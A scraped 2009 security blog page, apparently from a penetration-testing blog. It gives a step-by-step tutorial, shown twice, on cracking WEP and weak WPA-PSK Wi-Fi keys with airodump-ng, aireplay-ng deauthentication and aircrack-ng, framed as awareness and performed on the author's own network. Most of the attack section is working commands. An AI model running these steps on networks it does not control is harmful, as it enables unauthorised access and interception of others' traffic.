Over the next few posts throughout November I’ll be doing something slightly different. I’ll be demonstrating the penetration into a fictitious company called HackMe Ltd.
The goal of this series of posts is to demonstrate how simple it is to penetrate a network, steal some data, and then erase the evidence of the intrusion. I’ll also be including details of what measures could have been taken to prevent or detect the attack. I want to keep things simple but still as realistic as possible.
Throughout the story I’ll be using common & simple techniques to footprint, scan and penetrate my target. After gaining access to the target, where at all possible I want to just use the native tools on the compromised systems to find and retrieve my data.
These set of posts are written to educate the reader, and hopefully increase security awareness.
Setting the Scene
So I’ve been given my Target. HackMe Ltd is a popular hobbyist magazine distribution company. My job is to steal the customer database and the accounts database. I must find a way in, get the data and get out, leaving as little evidence as possible.
Part 1 - Reconaisance
Part 2 - Breaking In
Part 3 - Kung Fu Shopping
I hope anyone reading this enjoys these posts and I welcome comments and feedback.
Showing posts with label penetration. Show all posts
Showing posts with label penetration. Show all posts
Saturday, December 12, 2009
Wireless Network Penetration with BACKTRACK
The purpose of this blog post is to list the tools used and steps followed for breaking into a wireless network protected with WEP or WPA-PSK encryption. Hopefully this blog post will help the reader recognise how trivial it is to bypass WEP encryption or WPA-PSK encryption protected with a weak password.
The steps followed below and the tools used can also be employed to break WPA-PSK encryption that utilizes weak passwords or pass-phrases. I shall point out the changes necessary to break WPA-PSK where appropriate.
The network that was penetrated in this example was my own network, however the encryption and setup were the same as what would usually be found on most wireless networks.
Tools
- airodump-ng
- aireplay-ng
- aircrack-ng
- Wireless Assistant
The Attack
airodump-ng wlan0
I see from the output that it correctly identifies my wireless network "joker" on channel 3 and provides the BSSID (we need this for later).
If my card wasn't correctly set up (i.e in promiscous and in monitor mode) I could either run airmon-ng or set it up manually as detailed below:
ifconfig wlan0 down
ifconfig wlan0 promisc
iwconfig wlan0 mode monitor
ifconfig wlan0 up
Then I would use ifconfig and iwconfig to make sure the settings were correct.
2. I now run airodump-ng with switches to tell it to only collect the Initialization Vectors (IV's) on channel 3 ad output it to a file using my wireless interface (wlan0)
airodump-ng --ivs -c 3 -w wepdump wlan0
The result of this are 2 files, wepdump-01.txt & webdump-01.ivs. The .ivs file is the one I am interested in.
When capturing data to break WPA-PSK do not use the --ivs switch. The entire packet needs to be captured. Another requirement packets to crack WPA-PSK is to force the client to re-associate with the AP. this can be done using the aireplay-ng tool and the following syntax:
aireplay-ng -0 1 -a {AP BSSID} -c {client BSSID} wlan0
To obtain the AP & client BSSID's i use kismet, however this can be done with aireplay-ng. Check out the switches.
Note: when collecting the IV's having the best signal possible will speed things up.
3.After 15 mins I stop the capture and run the collected IV's through aircrack-ng. I specify the BSSID in this command.
aircrack-ng -b 00:18:F8:4B:43:86 wepdump-01.ivs
As you can see it has decrypted the key as C3:C0:8C:90:3D
If i was decrypting WPA-PSK i would need to specify a dictionary file containing the password with the -w switch. My syntax would therefor look like this:
aircrack-ng -b 00:18:F8:4B:43:86 -w big-dictionary-file wpadump-01.cap
4. I now reconfigure my wireless card to connect to the wireless network.
Currently the card is in monitor mode so I reconfigure it using the following commands:
ifconfig wlan0 down
ifconfig wlan0 -promisc
iwconfig wlan0 managed
ifconfig wlan0 up
Once reconfigured I quickly check I can see the target network using:
iwlist scan
5. I now use the Wireless Assistant to connect the target network with the key.
6. After Connecting to the target network I check my network & wireless settings and test connectivity to the web.
Now I have an IP on this network I can either use this network connection to access the Internet or to perform further attacks against hosts on the wireless network or I could capture the web traffic and do interesting things with that.
Conclusion
WEP encryption is very broken. Only use as a last resort, and if no other encrytion is available. If you do need to use WEP use additional layers of security to protect your network further such as MAC Address Filtering, Hidden SSID, Fixed IP's or a limited DHCP scope. These additional measures can all be bypassed but they make the attackers job that little bit harder.
Thanks to the guys at Remote Exploit for putting together BackTrack. BackTrack3 Kicks Ass!!!
Links
Wireless Network Penetration with BACKTRACK
The purpose of this blog post is to list the tools used and steps followed for breaking into a wireless network protected with WEP or WPA-PSK encryption. Hopefully this blog post will help the reader recognise how trivial it is to bypass WEP encryption or WPA-PSK encryption protected with a weak password.
The steps followed below and the tools used can also be employed to break WPA-PSK encryption that utilizes weak passwords or pass-phrases. I shall point out the changes necessary to break WPA-PSK where appropriate.
The network that was penetrated in this example was my own network, however the encryption and setup were the same as what would usually be found on most wireless networks.
Tools
- airodump-ng
- aireplay-ng
- aircrack-ng
- Wireless Assistant
The Attack
airodump-ng wlan0
I see from the output that it correctly identifies my wireless network "joker" on channel 3 and provides the BSSID (we need this for later).
If my card wasn't correctly set up (i.e in promiscous and in monitor mode) I could either run airmon-ng or set it up manually as detailed below:
ifconfig wlan0 down
ifconfig wlan0 promisc
iwconfig wlan0 mode monitor
ifconfig wlan0 up
Then I would use ifconfig and iwconfig to make sure the settings were correct.
2. I now run airodump-ng with switches to tell it to only collect the Initialization Vectors (IV's) on channel 3 ad output it to a file using my wireless interface (wlan0)
airodump-ng --ivs -c 3 -w wepdump wlan0
The result of this are 2 files, wepdump-01.txt & webdump-01.ivs. The .ivs file is the one I am interested in.
When capturing data to break WPA-PSK do not use the --ivs switch. The entire packet needs to be captured. Another requirement packets to crack WPA-PSK is to force the client to re-associate with the AP. this can be done using the aireplay-ng tool and the following syntax:
aireplay-ng -0 1 -a {AP BSSID} -c {client BSSID} wlan0
To obtain the AP & client BSSID's i use kismet, however this can be done with aireplay-ng. Check out the switches.
Note: when collecting the IV's having the best signal possible will speed things up.
3.After 15 mins I stop the capture and run the collected IV's through aircrack-ng. I specify the BSSID in this command.
aircrack-ng -b 00:18:F8:4B:43:86 wepdump-01.ivs
As you can see it has decrypted the key as C3:C0:8C:90:3D
If i was decrypting WPA-PSK i would need to specify a dictionary file containing the password with the -w switch. My syntax would therefor look like this:
aircrack-ng -b 00:18:F8:4B:43:86 -w big-dictionary-file wpadump-01.cap
4. I now reconfigure my wireless card to connect to the wireless network.
Currently the card is in monitor mode so I reconfigure it using the following commands:
ifconfig wlan0 down
ifconfig wlan0 -promisc
iwconfig wlan0 managed
ifconfig wlan0 up
Once reconfigured I quickly check I can see the target network using:
iwlist scan
5. I now use the Wireless Assistant to connect the target network with the key.
6. After Connecting to the target network I check my network & wireless settings and test connectivity to the web.
Now I have an IP on this network I can either use this network connection to access the Internet or to perform further attacks against hosts on the wireless network or I could capture the web traffic and do interesting things with that.
Conclusion
WEP encryption is very broken. Only use as a last resort, and if no other encrytion is available. If you do need to use WEP use additional layers of security to protect your network further such as MAC Address Filtering, Hidden SSID, Fixed IP's or a limited DHCP scope. These additional measures can all be bypassed but they make the attackers job that little bit harder.
Thanks to the guys at Remote Exploit for putting together BackTrack. BackTrack3 Kicks Ass!!!
Links
Subscribe to:
Posts (Atom)
